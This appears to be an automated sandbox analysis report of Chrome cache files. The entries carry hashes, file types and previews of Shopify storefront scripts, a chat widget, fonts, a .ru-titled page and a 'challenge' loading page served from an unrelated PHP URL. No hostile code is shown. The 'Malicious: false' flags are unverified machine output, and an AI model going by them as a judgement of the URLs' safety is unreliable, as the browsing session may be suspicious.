.F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 101

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1621)
Category:	dropped
Size (bytes):	30792
Entropy (8bit):	5.208307502559694
Encrypted:	false
SSDEEP:
MD5:	FCC5AA05F61F293BCD2B52627D43132B
SHA1:	5B941128FC1540F4467B138E14B0E3056AB79FEB
SHA-256:	9ABFF01164B79C40B84D337B8D1A7A88B340C315C9BC0D98A51BECE9D523DD4C
SHA-512:	CF5272C82CC6F7CE5D3FD1E8F2A8C6DD4114A16DCDE9A1B4125BA84C8F75AFE4D2031C13FBE5AE5F6000F92C2D83D3EB00A5A017208F339C829EFF2B939A7FB7
Malicious:	false
Reputation:	unknown
Preview:	var CARTHIKE_ENV = "prod";..var currentScript = {. src: `${window.location.href}?shop=${window.Shopify.shop}`,.};..var chConfig = null;..var CARTHIKE_SERVER_URL = "http://localhost:3333";.if (CARTHIKE_ENV === "dev") {. CARTHIKE_SERVER_URL = "http://localhost:3333";.} else if (CARTHIKE_ENV === "staging") {. CARTHIKE_SERVER_URL = "https://staging.carthike.com";.} else if (CARTHIKE_ENV === "prod") {. CARTHIKE_SERVER_URL = "https://whatsapp.carthike.com";.}..function getParameterByName(name, url) {. if (!url) url = window.location.href;. name = name.replace(/[\[\]]/g, "\\$&");. var regex = new RegExp("[?&]" + name + "(=([^&#])\|&\|#\|$)"),. results = regex.exec(url);. if (!results) return null;. if (!results[2]) return "";. return decodeURIComponent(results[2].replace(/\+/g, " "));.}..function carthike_injectCss(css) {. /* @type {Element} /. var style = document.createElement("style");. /* @type {string} /. style.type = "text/css";. /* @type {string} */. style.rel = "

Chrome Cache Entry: 102

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32701)
Category:	downloaded
Size (bytes):	37678
Entropy (8bit):	5.221489906925804
Encrypted:	false
SSDEEP:
MD5:	102EC6ED5AFD7BA641D65DFAB03E8AEF
SHA1:	1D0993A66D613C83203075ADFC5A19143301F7AA
SHA-256:	1C0B396BD4D054B94ABAE1EB6A1BD6BA47BEB35525C57A217C77A862FF06D83F
SHA-512:	2311521895D96F14E56B7F9369CFD784F221D56E343C64D3AF9E3610958A0A2E2E33DBFAE783413D927DD4FB5F8DA285D75658ABB86BD229D26FF70CCA0B2DB9
Malicious:	false
Reputation:	unknown
URL:	https://55db36-5b.myshopify.com/cdn/shopifycloud/shopify/assets/storefront/features-1c0b396bd4d054b94abae1eb6a1bd6ba47beb35525c57a217c77a862ff06d83f.js
Preview:	!function(){var t=function(t){var n={exports:{}};return t.call(n.exports,n,n.exports),n.exports},n=function(t){return t&&t.__esModule?t:{default:t}},e=t((function(t){var n={}.toString;t.exports=function(t){return n.call(t).slice(8,-1)}})),r=t((function(t){var n=t.exports="undefined"!=typeof window&&window.Math==Math?window:"undefined"!=typeof self&&self.Math==Math?self:Function("return this")();"number"==typeof __g&&(__g=n)})),o=t((function(t){var n="__core-js_shared__",e=r[n]\|\|(r[n]={});t.exports=function(t){return e[t]\|\|(e[t]={})}})),i=t((function(t){var n=0,e=Math.random();t.exports=function(t){return"Symbol(".concat(void 0===t?"":t,")_",(++n+e).toString(36))}})),u=t((function(t){var n=o("wks"),e=r.Symbol,u="function"==typeof e;(t.exports=function(t){return n[t]\|\|(n[t]=u&&e[t]\|\|(u?e:i)("Symbol."+t))}).store=n})),c=t((function(t){var n=u("toStringTag"),r="Arguments"==e(function(){return arguments}()),o=function(t,n){try{return t[n]}catch(t){}};t.exports=function(t){var i,u,c;return v

Chrome Cache Entry: 103

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	XML 1.0 document, ASCII text
Category:	downloaded
Size (bytes):	243
Entropy (8bit):	5.594448489891135
Encrypted:	false
SSDEEP:
MD5:	54E461EA24276495BEE0F159E80A002A
SHA1:	36D1CAB90941AC207BDD662477F9B7E0CC922C4A
SHA-256:	E39AF79C9E4047E6F822068BEF5C71E6DA958C36C6343E1097A425583E20AE99
SHA-512:	6A8E9D94114CAA35259809AF42B7B12AE1F843F25472BC93D1230C73B151C1470D91CBFAEB9438F497745CA06A9090369A7B075F9DA25B650BDAAAD0073163BF
Malicious:	false
Reputation:	unknown
URL:	https://deverechemicals3.s3.amazonaws.com/apps/sc/setting_tab.php?shop=55db36-5b.myshopify.com
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5HB9JGWP5TF4WX9N</RequestId><HostId>tWwqMLGxrYDQ+Eg3fnS7bJndeKoDcahjgrMEB/X9FU+aoyDOZPwrS9UagT0AUyLAf4AH0/RzQJg=</HostId></Error>

Chrome Cache Entry: 104

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1458)
Category:	downloaded
Size (bytes):	1554
Entropy (8bit):	5.065658893200488
Encrypted:	false
SSDEEP:
MD5:	E14155791E2B33DB99315D5053A4FDA1
SHA1:	60ADD9C95C33540BA61D9758E3319620CCE6EAAD
SHA-256:	5EE00BCBC7C4AD409B450EC3C3C004D08C599CA5AC12904402B7E9A31F44077A
SHA-512:	8CD9762851D95B3239CAC31388E8B4F314624DC589D68522F283412E40D266F993492256B15D63754E3B464CA081BDD24B428E4EFD728684DD9155514D1222AA
Malicious:	false
Reputation:	unknown
URL:	https://55db36-5b.myshopify.com/cdn/shop/t/1/assets/details-modal.js?v=25581673532751508451723734290
Preview:	class DetailsModal extends HTMLElement{constructor(){super(),this.detailsContainer=this.querySelector("details"),this.summaryToggle=this.querySelector("summary"),this.detailsContainer.addEventListener("keyup",event=>event.code.toUpperCase()==="ESCAPE"&&this.close()),this.summaryToggle.addEventListener("click",this.onSummaryClick.bind(this)),this.querySelector('button[type="button"]').addEventListener("click",this.close.bind(this)),this.summaryToggle.setAttribute("role","button")}isOpen(){return this.detailsContainer.hasAttribute("open")}onSummaryClick(event){event.preventDefault(),event.target.closest("details").hasAttribute("open")?this.close():this.open(event)}onBodyClick(event){(!this.contains(event.target)\|\|event.target.classList.contains("modal-overlay"))&&this.close(!1)}open(event){this.onBodyClickEvent=this.onBodyClickEvent\|\|this.onBodyClick.bind(this),event.target.closest("details").setAttribute("open",!0),document.body.addEventListener("click",this.onBodyClickEvent),document.b

Chrome Cache Entry: 105

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (472), with CRLF line terminators
Category:	dropped
Size (bytes):	7050
Entropy (8bit):	4.730492987144924
Encrypted:	false
SSDEEP:
MD5:	269E2DA90582C6217A28843AE7CD25C1
SHA1:	AFC7BD4078E62B31EA477B0C0682EF12104F93E9
SHA-256:	EC25B9C823E449335F4CE0597216D1110543D053CD9A2B5E48099AB672F7B385
SHA-512:	DB95303E17D73288A38166E9F08FD9F8B9857D4B781FF5464989E0737034E1E945667F7359070D1605C159843AAFA4A8BDE32F8998208384B67F166B76A80473
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Hot Rod Enthusiasts - thebookwormprojectonu.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">.. <style>.. body {.. padding-top: 56px;.. background-color: #f8f9fa;.. }.. .hero {.. background: url('https://th.bing.com/th/id/OIP.-_aN3aVBqVYV1FNBKXkZjwHaD5') no-repeat center center;.. background-size: cover;.. color: white;.. padding: 150px 0;.. text-align: center;.. }.. .content-section {.. padding: 60px 0;.. }.. .footer {.. background: #343a40;.. color: white;.. padding: 20px 0;..

Chrome Cache Entry: 106

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32450)
Category:	downloaded
Size (bytes):	32539
Entropy (8bit):	5.062604808837828
Encrypted:	false
SSDEEP:
MD5:	BAB2EDCDC7BC683FAC601E56ADCB345A
SHA1:	28176B5A1B25E89448394D5C89C1571B5777DBF5
SHA-256:	13606640464411C69092866F44FEA1CFB87B07E07E1337C37641A561E3540BB7
SHA-512:	5BCCA1CBA2A01A47753A8E2A5DF304047761EE56A7F4C79C71DD45B30D3D8F7D72D4619881E1E5D990531E87AD8F7CE9AE99FD3661F6AFEB34E38A5A47F76EA1
Malicious:	false
Reputation:	unknown
URL:	https://55db36-5b.myshopify.com/cdn/shop/t/1/assets/global.js?v=88558128918567037191723734290
Preview:	function getFocusableElements(container){return Array.from(container.querySelectorAll("summary, a[href], button:enabled, [tabindex]:not([tabindex^='-']), [draggable], area, input:not([type=hidden]):enabled, select:enabled, textarea:enabled, object, iframe"))}class SectionId{static#separator="__";static parseId(qualifiedSectionId){return qualifiedSectionId.split(SectionId.#separator)[0]}static parseSectionName(qualifiedSectionId){return qualifiedSectionId.split(SectionId.#separator)[1]}static getIdForSection(sectionId,sectionName){return`${sectionId}${SectionId.#separator}${sectionName}`}}class HTMLUpdateUtility{static viewTransition(oldNode,newContent,preProcessCallbacks=[],postProcessCallbacks=[]){preProcessCallbacks?.forEach(callback=>callback(newContent));const newNodeWrapper=document.createElement("div");HTMLUpdateUtility.setInnerHTML(newNodeWrapper,newContent.outerHTML);const newNode=newNodeWrapper.firstChild,uniqueKey=Date.now();oldNode.querySelectorAll("[id], [form]").forEach(el

Chrome Cache Entry: 107

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (6216)
Category:	dropped
Size (bytes):	6316
Entropy (8bit):	5.00734209859652
Encrypted:	false
SSDEEP:
MD5:	7605FD02572A43A5D9E7F63218EE9589
SHA1:	44AD0A54EF845E4E3EA869A2841D25AFBC275F51
SHA-256:	294F9F36A0396F5AE6826C03C07865984B2842037F8A64D16008158246764E34
SHA-512:	AFF8BED40661E5AFAEBFD09EF1BD18A73DD269ABDD3109FBE4BA71F9DC8C98DA9DC8BFE385D505FE370451EBE51C94F5698F3540A32B6432238B8EF3165F2F3C
Malicious:	false
Reputation:	unknown
Preview:	class PredictiveSearch extends SearchForm{constructor(){super(),this.cachedResults={},this.predictiveSearchResults=this.querySelector("[data-predictive-search]"),this.allPredictiveSearchInstances=document.querySelectorAll("predictive-search"),this.isOpen=!1,this.abortController=new AbortController,this.searchTerm="",this.setupEventListeners()}setupEventListeners(){this.input.form.addEventListener("submit",this.onFormSubmit.bind(this)),this.input.addEventListener("focus",this.onFocus.bind(this)),this.addEventListener("focusout",this.onFocusOut.bind(this)),this.addEventListener("keyup",this.onKeyup.bind(this)),this.addEventListener("keydown",this.onKeydown.bind(this))}getQuery(){return this.input.value.trim()}onChange(){super.onChange();const newSearchTerm=this.getQuery();if((!this.searchTerm\|\|!newSearchTerm.startsWith(this.searchTerm))&&this.querySelector("#predictive-search-results-groups-wrapper")?.remove(),this.updateSearchForTerm(this.searchTerm,newSearchTerm),this.searchTerm=newSea

Chrome Cache Entry: 108

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (12547), with no line terminators
Category:	downloaded
Size (bytes):	12547
Entropy (8bit):	5.227101350055193
Encrypted:	false
SSDEEP:
MD5:	009977DCDD3CB41B031746F155F48C22
SHA1:	2D5B2D257BCE686E800A5E2D3EABAF1D2CE9DDDE
SHA-256:	9F951EB7D8D53973C719DE211F807D63AF81C644E5B9A6AE72661AC408D472F6
SHA-512:	977E5C8D75B303590ADC38F974794AA61F94025805AFB47E67D4743628172A778F6E0EB0058512868C020D12B78156FA7D7B94D489C5E50DC5B341991D853D52
Malicious:	false
Reputation:	unknown
URL:	https://55db36-5b.myshopify.com/cdn/shopifycloud/shopify/assets/storefront/load_feature-9f951eb7d8d53973c719de211f807d63af81c644e5b9a6ae72661ac408d472f6.js
Preview:	!function(){var e=function(e){var t={exports:{}};return e.call(t.exports,t,t.exports),t.exports},t=function(){function e(e,t){var r=[],o=!0,a=!1,n=void 0;try{for(var i,s=e[Symbol.iterator]();!(o=(i=s.next()).done)&&(r.push(i.value),!t\|\|r.length!==t);o=!0);}catch(e){a=!0,n=e}finally{try{!o&&s.return&&s.return()}finally{if(a)throw n}}return r}return function(t,r){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t))return e(t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),r=function(e){return e&&e.__esModule?e:{default:e}},o=function(e){if(Array.isArray(e)){for(var t=0,r=Array(e.length);t<e.length;t++)r[t]=e[t];return r}return Array.from(e)},a=e((function(e,t){"use strict";function r(e){"loading"!==document.readyState?e():document.addEventListener?document.addEventListener("DOMContentLoaded",e):document.attachEvent("onreadystatechange",(function(){"loading"!==document.readyState&&e()}))}Object.defineProperty(t,"__esModule",{value:!0}),t.default

Chrome Cache Entry: 109

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	dropped
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 110

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	15
Entropy (8bit):	3.506890595608519
Encrypted:	false
SSDEEP:
MD5:	ED4E32DCD6E93353CB43178C49666030
SHA1:	F314C9DDE91598E7CB893AE1152290A592DD5A4F
SHA-256:	ED4B2C7AAF7CF967A78D06D9CB24CB386E97BC2D54CA6DD3C1A2DD747FDE57DF
SHA-512:	240A631DE0010707522C4B0DD5EDF42374A446E27D28BBD55B0046A396133EC2AE4836278F6AEF8D24607970A0F881E3F19F6B4922C49824BC48A2E543C1199B
Malicious:	false
Reputation:	unknown
URL:	https://whatsapp.carthike.com/api/chat/public/config?shop=55db36-5b.myshopify.com
Preview:	{"config":null}

Chrome Cache Entry: 112

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (386)
Category:	downloaded
Size (bytes):	476
Entropy (8bit):	5.043089351904878
Encrypted:	false
SSDEEP:
MD5:	D35DBC6CA3DA161C1344554402C752F7
SHA1:	08620DDE5754CB3D60C2DD014FAF18231CCE18FA
SHA-256:	34F396BB59395FA5E26B55F3719A10471E2232C60713D501F8EAD67152B871A0
SHA-512:	B56D13B20C73CD1D72B8B1D0791DAFA49C0780101081A38BBF143B10289EF56C2B6992F913A145F7B90B2DF5E4A1398F34778D1497DC80C5C9E28A1E429ACB3E
Malicious:	false
Reputation:	unknown
URL:	https://55db36-5b.myshopify.com/cdn/shop/t/1/assets/pubsub.js?v=158357773527763999511723734290
Preview:	let subscribers={};function subscribe(eventName,callback){return subscribers[eventName]===void 0&&(subscribers[eventName]=[]),subscribers[eventName]=[...subscribers[eventName],callback],function(){subscribers[eventName]=subscribers[eventName].filter(cb=>cb!==callback)}}function publish(eventName,data){subscribers[eventName]&&subscribers[eventName].forEach(callback=>{callback(data)})}.//# sourceMappingURL=/cdn/shop/t/1/assets/pubsub.js.map?v=158357773527763999511723734290.

Chrome Cache Entry: 113

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (18747)
Category:	dropped
Size (bytes):	18762
Entropy (8bit):	5.182766319203465
Encrypted:	false
SSDEEP:
MD5:	469BA1404BC55684B8C97ED4244E987B
SHA1:	96E68AE3093847C3364F5A859AFEEC19E258B8F4
SHA-256:	0339974E1AD182755334D2ED3F5E266D7E146ED05F118B49A9C104B330FD9034
SHA-512:	CBBE58D7D6EF1898FFD44A08D4DBC98213328C28DE666E4643FCC1D070752CC00117733B943EEE1D4C07F01FC193AEFC48D2D6B5E15DB919BDC473025B6E8B44
Malicious:	false
Reputation:	unknown
Preview:	!function(){"use strict";var e,t=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},n=function(e){if("loading"===document.readyState)return"loading";var n=t();if(n){if(e<n.domInteractive)return"loading";if(0===n.domContentLoadedEventStart\|\|e<n.domContentLoadedEventStart)return"dom-interactive";if(0===n.domComplete\|\|e<n.domComplete)return"dom-content-loaded"}return"complete"},r=function(e){var t=e.nodeName;return 1===e.nodeType?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},o=function(e,t){var n="";try{for(;e&&9!==e.nodeType;){var o=e,i=o.id?"#"+o.id:r(o)+(o.classList&&o.classList.value&&o.classList.value.trim()&&o.classList.value.trim().length?"."+o.classList.value.trim().replace(/\s+/g,"."):"");if(n.length+i.length>(t\|\|100)-1)return n\|\|i;if(n=n?i+">"+n:i,o.id)break;e=o.parentNode}}catch(e){}return n},i=-1,a=function(){return i},s=function(e){addEventListener("pageshow",(function(t){t.persisted&&(i=t.timeStamp,e(t))}),!

Chrome Cache Entry: 114

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	66931
Entropy (8bit):	4.947969378615286
Encrypted:	false
SSDEEP:
MD5:	8938FB95DDF2474857975396F66BA224
SHA1:	0577833AACB4249890DC008D045DD6F71B2D908F
SHA-256:	3959EAF982F07A6112360ED8BCE6569D2844D0D7BCA0B9D8F3129C9FDF27D96C
SHA-512:	40B69B8D7347B0863A2795F111B0E4D4C1FEF7B3744E36F3CE3EDA5C71589CBCE24221B6418CE06EA8A925FEDE1C6B7E60A8C48D085E375C62217104C28D4416
Malicious:	false
Reputation:	unknown
URL:	https://55db36-5b.myshopify.com/cdn/shop/t/1/assets/base.css?v=144968985024194912401723734289
Preview:	:root{--alpha-button-background: 1;--alpha-button-border: 1;--alpha-link: .85;--alpha-badge-border: .1;--focused-base-outline: .2rem solid rgba(var(--color-foreground), .5);--focused-base-outline-offset: .3rem;--focused-base-box-shadow: 0 0 0 .3rem rgb(var(--color-background)), 0 0 .5rem .4rem rgba(var(--color-foreground), .3)}.product-card-wrapper .card,.contains-card--product{--border-radius: var(--product-card-corner-radius);--border-width: var(--product-card-border-width);--border-opacity: var(--product-card-border-opacity);--shadow-horizontal-offset: var(--product-card-shadow-horizontal-offset);--shadow-vertical-offset: var(--product-card-shadow-vertical-offset);--shadow-blur-radius: var(--product-card-shadow-blur-radius);--shadow-opacity: var(--product-card-shadow-opacity);--shadow-visible: var(--product-card-shadow-visible);--image-padding: var(--product-card-image-padding);--text-alignment: var(--product-card-text-alignment)}.collection-card-wrapper .card,.contains-card--collec

Chrome Cache Entry: 118

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	3937
Entropy (8bit):	5.355352816571484
Encrypted:	false
SSDEEP:
MD5:	578AA124D115B9D36C20E28B49A2A1B1
SHA1:	F7F42B31CF33509D2B6C3AD7DED9B32BAD3185FC
SHA-256:	64A530DAD84560BCB259FC7A6872AD18CD9D2CCD66481AC68D0C1F8FAD121344
SHA-512:	C5DEE0A1EACCCEEA48B21F9485644236D4459A20C98E259DEF0917BDF2032B7E2A30A13E21B638637AB9CD9C19C4A531FF6A6F68C43F94A5838CBEBF440D8902
Malicious:	false
Reputation:	unknown
URL:	"https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700&display=swap"
Preview:	/* latin-ext /.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLDz8Z1JlFc-K.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./ latin /.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLDz8Z1xlFQ.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./ latin-ext */.@font-face {. font-family: 'Poppins';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/poppins/v21/pxiEyp8kv8JHgFVrJJnecmNE.woff2) format('w

Chrome Cache Entry: 119

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2836)
Category:	downloaded
Size (bytes):	2929
Entropy (8bit):	5.249811161457515
Encrypted:	false
SSDEEP:
MD5:	55DA640B10EC0905C139A0EA3CE26AC1
SHA1:	9B14125010872D4723226CB76D8B76A0DE475409
SHA-256:	F20AD99CEAA2F955C21994A07DB34379ECD94EC9B4FA885EED198925D296DC0D
SHA-512:	8023E45D7E1ADA8CEC2077D6A6C1B4531329FB539D66EEE301CAD811DDCFC08E9B060538C367772CE365244505D2B5693274B44C800E03C11D9241173C7C352C
Malicious:	false
Reputation:	unknown
URL:	https://55db36-5b.myshopify.com/cdn/shop/t/1/assets/animations.js?v=88693664871331136111723734289
Preview:	const SCROLL_ANIMATION_TRIGGER_CLASSNAME="scroll-trigger",SCROLL_ANIMATION_OFFSCREEN_CLASSNAME="scroll-trigger--offscreen",SCROLL_ZOOM_IN_TRIGGER_CLASSNAME="animate--zoom-in",SCROLL_ANIMATION_CANCEL_CLASSNAME="scroll-trigger--cancel";function onIntersection(elements,observer){elements.forEach((element,index)=>{if(element.isIntersecting){const elementTarget=element.target;elementTarget.classList.contains(SCROLL_ANIMATION_OFFSCREEN_CLASSNAME)&&(elementTarget.classList.remove(SCROLL_ANIMATION_OFFSCREEN_CLASSNAME),elementTarget.hasAttribute("data-cascade")&&elementTarget.setAttribute("style",`--animation-order: ${index};`)),observer.unobserve(elementTarget)}else element.target.classList.add(SCROLL_ANIMATION_OFFSCREEN_CLASSNAME),element.target.classList.remove(SCROLL_ANIMATION_CANCEL_CLASSNAME)})}function initializeScrollAnimationTrigger(rootEl=document,isDesignModeEvent=!1){const animationTriggerElements=Array.from(rootEl.getElementsByClassName(SCROLL_ANIMATION_TRIGGER_CLASSNAME));if(anima

Chrome Cache Entry: 120

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (62605)
Category:	dropped
Size (bytes):	62653
Entropy (8bit):	5.343169197914495
Encrypted:	false
SSDEEP:
MD5:	D6EF635E56E3AB574C7F10E9A5AB49EC
SHA1:	3C384372E7E2D221150A14D60776D7C7FEB8ADE6
SHA-256:	468E777478117BE830B202B97CDF0304BEE6F3D9FD4CB1CE70650ED93B7FA4A1
SHA-512:	CEFE7B68B1C25D8192F3D3BBC734D89894E23AB0B6BDBE35878255A574C53FFA1DE27002B5098ABB2DEFB5D3427B309B0F070E010967CE5CFFB1669745A95A5D
Malicious:	false
Reputation:	unknown
Preview:	(()=>{var e={875:(e,t)=>{function n(e,t,n){t.open("POST",e),t.setRequestHeader("Content-type","text/plain"),t.send(JSON.stringify(n))}t.monorailSend=function(e,t,r){if(window&&window.navigator&&"function"==typeof window.navigator.sendBeacon&&t.utils.isNative(window.navigator.sendBeacon)&&"function"==typeof window.Blob&&(!(o=window.navigator.userAgent)\|\|-1===o.lastIndexOf("iPhone; CPU iPhone OS 12_")&&-1===o.lastIndexOf("iPad; CPU OS 12_"))){var i=new window.Blob([JSON.stringify(r)],{type:"text/plain"});try{if(window.navigator.sendBeacon(e,i))return!0}catch(e){}}var o,a=new XMLHttpRequest;try{n(e,a,r)}catch(i){n(e,a=new t.boomerang_frame.XMLHttpRequest,r)}};const r="xxxx-4xxx-xxxx-xxxxxxxxxxxx";t.buildUUID=function(){let e="";try{const t=window.crypto,n=new Uint16Array(31);t.getRandomValues(n);let i=0;e=r.replace(/[x]/g,(e=>{const t=n[i]%16;return i++,("x"===e?t:3&t\|8).toString(16)})).toUpperCase()}catch(t){e=r.replace(/[x]/g,(e=>{const t=16*Math.random()\|0;return("x"===e?t:3&t\|8).toStr

Chrome Cache Entry: 121

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (1392), with CRLF line terminators
Category:	downloaded
Size (bytes):	2101
Entropy (8bit):	5.347845780734505
Encrypted:	false
SSDEEP:
MD5:	7D967C15221242FD1BF230B05389F8E4
SHA1:	C7EC21036CBE5F1A991E6C0B81847F027BAB783B
SHA-256:	28E2FAFDAC406EB7053E8440FCD3049392F604C96723D34263D3A820D4F4DF36
SHA-512:	357A5651AAC74686AB741D6B04562A65046557795A0606CCF03DF03BAA7A43A44EA519F601F0DE773B49D94710BF23E95984C0AC1A2653097D85E9A2587193FD
Malicious:	false
Reputation:	unknown
URL:	https://50ou-vasil-levski.com/tvavx.php
Preview:	<html>...<head>....<meta name="robots" content="noindex, nofollow">....<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">....<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">....<style>body,html{margin:30px;display:flex;justify-content:center;align-items:center;flex-direction:column}.challenge {position: relative;width: 80px;height: 80px;}.challenge div {animation: 1.2s cubic-bezier(.5, 0, .5, 1) infinite challenge;transform-origin: 40px 40px;}.challenge div:after {content: " ";display: block;position: absolute;width: 7px;height: 7px;border-radius: 50%;background: #3B8AFF;margin: -4px 0 0 -4px;}.challenge div:first-child {animation-delay: -36ms;}.challenge div:first-child:after {top: 63px;left: 63px;}.challenge div:nth-child(2) {animation-delay: -72ms;}.challenge div:nth-child(2):after {top: 68px;left: 56px;}.challenge div:nth-child(3) {animation-delay: -108ms;}.challenge div:nth-child(3):after {top: 71px;left: 48px;}.challenge div:nth-ch

Chrome Cache Entry: 122

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1339)
Category:	downloaded
Size (bytes):	1440
Entropy (8bit):	4.982213396879186
Encrypted:	false
SSDEEP:
MD5:	9773640F06624372DD60E5BF4EED5247
SHA1:	F45D89E833B2D21E015384BE0125C86725567FE9
SHA-256:	C436A4F4EB905C3AACCDF94308BBB57236EB6AC820E760A9EE0C4FD6052CC988
SHA-512:	3401D1D6168A8597D7FC7D50DEF2FA110EAE6AD1B45644E4A2146FC05C31D1824BA49741EE54C05D08F0DCFEC00264272F983861F523884CE22F09379219EAB9
Malicious:	false
Reputation:	unknown
URL:	https://55db36-5b.myshopify.com/cdn/shop/t/1/assets/details-disclosure.js?v=13653116266235556501723734290
Preview:	class DetailsDisclosure extends HTMLElement{constructor(){super(),this.mainDetailsToggle=this.querySelector("details"),this.content=this.mainDetailsToggle.querySelector("summary").nextElementSibling,this.mainDetailsToggle.addEventListener("focusout",this.onFocusOut.bind(this)),this.mainDetailsToggle.addEventListener("toggle",this.onToggle.bind(this))}onFocusOut(){setTimeout(()=>{this.contains(document.activeElement)\|\|this.close()})}onToggle(){this.animations\|\|(this.animations=this.content.getAnimations()),this.mainDetailsToggle.hasAttribute("open")?this.animations.forEach(animation=>animation.play()):this.animations.forEach(animation=>animation.cancel())}close(){this.mainDetailsToggle.removeAttribute("open"),this.mainDetailsToggle.querySelector("summary").setAttribute("aria-expanded",!1)}}customElements.define("details-disclosure",DetailsDisclosure);class HeaderMenu extends DetailsDisclosure{constructor(){super(),this.header=document.querySelector(".header-wrapper")}onToggle(){this.hea

Chrome Cache Entry: 123

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	258
Entropy (8bit):	5.01894250267558
Encrypted:	false
SSDEEP:
MD5:	1F9FBFB00E90D309115198100029EB74
SHA1:	C763D1FA581A8DB5B7858FBEB491596D0508C00C
SHA-256:	1F2914E91511472E6B5626C3C856CED06AC6CE23101C4CC9C0B99C67363CF1CE
SHA-512:	0002140C898F06D88D54C60774BF879E06F54C992FEE326D758574B3F4C9D8D1360B644860B0E3DEA116BA87059F6F5611CF76FEC80139F77EA5FDDF9B92869D
Malicious:	false
Reputation:	unknown
